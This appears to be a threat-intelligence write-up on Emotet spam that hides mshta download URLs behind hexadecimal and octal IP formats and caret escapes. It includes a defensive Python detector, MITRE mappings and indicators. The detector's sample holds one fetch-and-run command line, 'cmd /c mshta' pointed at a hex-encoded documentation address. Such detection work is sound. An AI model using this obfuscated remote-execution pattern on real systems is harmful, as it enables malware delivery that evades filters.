Emotet spam campaigns are abusing hexadecimal and octal IP address formats to evade pattern-matching detection, delivering malware via Excel 4.0 Macros and HTA code. The operation leads to second-stage payloads like TrickBot and Cobalt Strike beacons, with guidance for defenders to detect and block these techniques. #Emotet #CobaltStrike
Keypoints
- Emotet spam campaigns use hexadecimal and octal representations of IP addresses to evade detection.
- Emails attach documents using Excel 4.0 Macros, abusing a dated feature to deliver malware and trigger auto_open execution.
- The URL is obfuscated with carets, and its host is a hexadecimal representation of the IP address rather than the usual dotted-decimal form.
- Macro activity invokes cmd.exe > mshta.exe to download and execute HTA code from a remote host.
- Successful execution results in second-stage beacons such as TrickBot and Cobalt Strike.
- Security teams can use the unusual IP representations and command-line patterns as detection opportunities and should treat these IPs as suspicious.
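Pattern-matching rules usually expect dotted-decimal addresses, so the detection opportunity in the last keypoint comes down to normalizing every IPv4 literal seen in URLs and command lines before matching. The Python below is an added example, not code from the original article or its authors: it reproduces the classic inet_aton parsing rules (hexadecimal, octal, decimal and short-form addresses), removes cmd.exe caret escapes, and flags any URL host that is a disguised IPv4 literal. The sample URLs and command line are constructed around the RFC 5737 documentation address 192.0.2.10 and are not the indicators on this page.

```python
import re

# Constructed samples (not the page's IoCs): one address written four ways.
SAMPLES = [
    "http://192.0.2.10/x.hta",      # plain dotted-decimal, should not be flagged
    "http://0xc000020a/x.hta",      # hexadecimal, single 32-bit value
    "http://0300.0.02.012/x.hta",   # octal, dotted
    "http://3221225994/x.hta",      # decimal integer
]
# Constructed command line in the shape the article describes (carets + mshta + hex host).
SAMPLE_CMDLINE = 'cmd /c mshta h^t^tp://0xc000020a/x.hta'

# One inet_aton part: 0x.. hex, leading-zero octal, or plain decimal.
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def _part_value(part):
    """Decode one address part using inet_aton's base rules; None if malformed."""
    if not _PART.match(part):
        return None
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def normalize_ipv4(host):
    """Return the dotted-decimal form of any inet_aton-accepted host, else None.

    1 part  -> whole 32-bit value        2 parts -> a.bbb (24-bit last part)
    3 parts -> a.b.cc (16-bit last part) 4 parts -> a.b.c.d (8 bits each)
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_part_value(p) for p in parts]
    if any(v is None for v in values):
        return None
    *head, last = values
    if any(v > 255 for v in head):
        return None
    last_bits = 8 * (5 - len(parts))  # 32, 24, 16 or 8
    if last >= 1 << last_bits:
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    n = (n << last_bits) | last
    return ".".join(str((n >> s) & 0xFF) for s in (24, 16, 8, 0))


def is_nonstandard_ip(host):
    """True when the host is an IPv4 literal that is NOT plain dotted-decimal."""
    canonical = normalize_ipv4(host)
    return canonical is not None and canonical != host


# Scheme followed by the host, stopping at path, port, query or fragment.
_HOST_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://([^/:?#]+)")
# Any URL-looking token inside free text such as a process command line.
_URL_IN_TEXT = re.compile(r"[a-zA-Z][a-zA-Z0-9+.-]*://[^\s\"']+")


def flag_url(url):
    """Return (host, canonical_ip) when the URL host is a disguised IPv4 literal, else None."""
    m = _HOST_RE.match(url)
    if not m:
        return None
    host = m.group(1)
    if is_nonstandard_ip(host):
        return host, normalize_ipv4(host)
    return None


def scan_command_line(cmdline):
    """Strip cmd.exe caret escapes (naively: every '^'), then flag disguised IP hosts."""
    cleaned = cmdline.replace("^", "")
    hits = []
    for url in _URL_IN_TEXT.findall(cleaned):
        hit = flag_url(url)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", flag_url(url))
    print(SAMPLE_CMDLINE, "->", scan_command_line(SAMPLE_CMDLINE))
```

The normalizer deliberately implements the parsing rules itself instead of calling `socket.inet_aton`, whose acceptance of hex and octal forms varies by platform; a detection rule should canonicalize the same way on every host. Feeding the canonical address into existing blocklists, and alerting on any host where `is_nonstandard_ip` is true, covers both the hexadecimal and octal variants the article describes.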
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Attachment – “The samples we found start with an email-attached document using Excel 4.0 Macros…”
- [T1204.002] User Execution: Malicious File – “The samples we found start with an email-attached document using Excel 4.0 Macros… Abuse of the feature in this case allows the malware to execute once the document is opened using the auto_open macro.”
- [T1027] Obfuscated/Compressed Files and Information – “The URL is obfuscated with carets and the host contains a hexadecimal representation of the IP address.”
- [T1105] Ingress Tool Transfer – “which will download and execute an HTML application (HTA) code from the remote host.”
- [T1218.005] Mshta – “As observed, the macro also invokes cmd.exe > mshta.exe with the URL as an argument to download and execute an HTA code from the remote host.”
- [T1059.003] Windows Command Shell – “cmd.exe > mshta.exe” used to launch the HTA payload from a remote host.
Indicators of Compromise
- [SHA256] – Hexadecimal IP address sample – e492f31ca20d99888b2434dcb4d9af1f93ed4c485b9bd2bc550ce8ae8021b9cd
- [SHA256] – Octal IP address sample – 3e9701129f13f13f7b873f55dc3d43d04cbd1dd3f85814270bb1b177394926b5
- [URLs] – 193[.]42[.]36[.]245, 46[.]105[.]81[.]76